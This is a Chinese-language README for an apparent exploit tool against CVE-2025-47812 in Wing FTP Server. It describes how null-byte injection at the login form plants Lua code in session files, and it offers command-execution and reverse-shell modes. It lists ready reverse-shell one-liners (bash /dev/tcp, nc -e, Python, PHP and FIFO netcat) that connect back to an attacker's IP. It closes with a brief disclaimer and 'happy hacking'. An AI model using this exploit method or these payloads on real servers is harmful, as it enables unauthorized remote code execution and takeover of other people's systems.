CVE-2025-47812 - Wing FTP Server远程代码执行(RCE)
===========================================================
作者:blindma1den
日期:2025年7月
漏洞类型:远程代码执行(未认证)
目标:Wing FTP Server < 7.4.4
CVSS评分:10.0(严重)
漏洞描述
该脚本利用CVE-2025-47812,这是Wing FTP Server Web界面中的一个严重漏洞, 允许远程攻击者在无需认证的情况下执行任意系统命令或打开反向shell。
该漏洞是由于登录表单(/loginok.html)中对空字节(%00)处理不当造成的。
这允许将Lua代码注入到会话文件中,当访问如/dir.html等端点时这些代码会被执行。
来源
NVD描述:https://nvd.nist.gov/vuln/detail/CVE-2025-47812
功能特性
- 命令执行(例如:
whoami、uname -a) - 多种反向shell有效载荷
- 自动提取UID会话cookie
- 清晰的模块化Python 3实现
环境要求
- Python 3.7+
- requests模块
安装依赖:
|
|
使用方法
运行脚本:
|
|
系统将提示输入:
- 目标URL(例如:http://127.0.0.1:5466)
- 用户名(默认:anonymous)
- 利用模式: [1] 运行命令 [2] 启动反向shell
示例
[1] 运行命令:
|
|
[2] 反向shell:
|
|
在触发shell之前启动监听器:
|
|
使用的有效载荷(反向shell)
Bash: bash -i >& /dev/tcp/IP/PORT 0>&1
Python3: python3 -c ‘import socket,subprocess,os; …’
Netcat: nc IP PORT -e /bin/sh
PHP: php -r ‘$sock=fsockopen(“IP”,PORT); …’
FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i …
免责声明
此代码仅用于教育目的。请勿在您不拥有或未经明确授权测试的系统上使用此漏洞利用程序。 未经授权使用是非法的且不道德的。
请立即修补您的系统。Wing FTP Server 7.4.4版本修复了此漏洞。
祝黑客愉快!